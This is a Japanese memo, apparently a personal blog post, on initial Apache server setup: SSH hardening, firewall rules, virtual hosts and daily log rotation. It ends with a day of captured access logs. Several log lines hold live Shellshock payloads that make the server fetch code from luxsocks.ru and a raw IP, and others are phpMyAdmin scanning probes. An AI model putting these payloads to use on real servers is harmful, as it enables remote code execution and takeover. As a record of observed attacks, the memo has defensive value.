Apacheの初期設定 覚え書き
(1)SSHのポートを変更する
PermitRootLogin no #rootの直ログイン禁止 Port 0000 #SSHのポート変更
(2)接続制限
# accept SSH, HTTP, HTTPS -A INPUT -p tcp -m state --syn --state NEW --dport 0000 #以下略
参考:
「Webサーバーを構築しよう(1)」~初心者でもよくわかる!VPSによるWebサーバー構築講座(3) - さくらのナレッジ
(3)バーチャルホスト設定
※DocumentRootは、/srv/httpd/xxx/にそれぞれ作成
vim /etc/httpd/conf/httpd.conf
Include /srv/httpd/apache.conf
Include /srv/httpd/hoge/apache.conf Include /srv/httpd/fuga/apache.conf Include /srv/httpd/hage/apache.conf apachectl configtest apachectl graceful
参考:
仕事で使える魔法のLAMP(23):設定ファイルや公開ドキュメントの配置を考える - @IT
(4)ログ設定(日次ローテート)
vim /srv/httpd/hoge/apache.conf
CustomLog "|/usr/sbin/rotatelogs /srv/httpd/hoge/logs/access%Y%m%d.log 86400 540" combined ErrorLog "|/usr/sbin/rotatelogs /srv/httpd/hoge/logs/error%Y%m%d.log 86400 540"
参考:
Apacheのログ設定まとめ - 波打際のブログさん
一日後のアクセスログ
195.22.104.168 - - [03/May/2015:03:58:36 +0900] "GET /cgi-bin/php5 HTTP/1.1" 404 288 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http//luxsocks.ru ; wget https://luxsocks.ru --no-check-certificate ; curl http//luxsocks.ru// ; curl -k https://luxsocks.ru ; lwp-download http://luxsocks.ru ; GET http://luxsocks.ru ; lynx http://luxsocks.ru ; wget http://174.122.42.230/luxx ; curl http://174.122.42.230/luxx ; fetch http://174.122.42.230/luxx ; lwp-download http://174.122.42.230/luxx ; GET http://174.122.42.230/luxx ; lynx http://174.122.42.230/luxx\");'"
195.22.104.168 - - [03/May/2015:03:58:36 +0900] "GET /cgi-bin/php5-cli HTTP/1.1" 404 292 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http//luxsocks.ru ; wget https://luxsocks.ru --no-check-certificate ; curl http//luxsocks.ru// ; curl -k https://luxsocks.ru ; lwp-download http://luxsocks.ru ; GET http://luxsocks.ru ; lynx http://luxsocks.ru ; wget http://174.122.42.230/luxx ; curl http://174.122.42.230/luxx ; fetch http://174.122.42.230/luxx ; lwp-download http://174.122.42.230/luxx ; GET http://174.122.42.230/luxx ; lynx http://174.122.42.230/luxx\");'"
195.22.104.168 - - [03/May/2015:03:58:36 +0900] "GET /phppath/php HTTP/1.1" 404 287 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http//luxsocks.ru ; wget https://luxsocks.ru --no-check-certificate ; curl http//luxsocks.ru// ; curl -k https://luxsocks.ru ; lwp-download http://luxsocks.ru ; GET http://luxsocks.ru ; lynx http://luxsocks.ru ; wget http://174.122.42.230/luxx ; curl http://174.122.42.230/luxx ; fetch http://174.122.42.230/luxx ; lwp-download http://174.122.42.230/luxx ; GET http://174.122.42.230/luxx ; lynx http://174.122.42.230/luxx\");'"
1.214.119.227 - - [03/May/2015:06:48:55 +0900] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 304 "-" "-"
1.214.119.227 - - [03/May/2015:06:48:55 +0900] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 304 "-" "-"
1.214.119.227 - - [03/May/2015:06:48:55 +0900] "GET //pma/scripts/setup.php HTTP/1.1" 404 297 "-" "-"
1.214.119.227 - - [03/May/2015:06:48:56 +0900] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
1.214.119.227 - - [03/May/2015:06:48:56 +0900] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 301 "-" "-"怖い。。
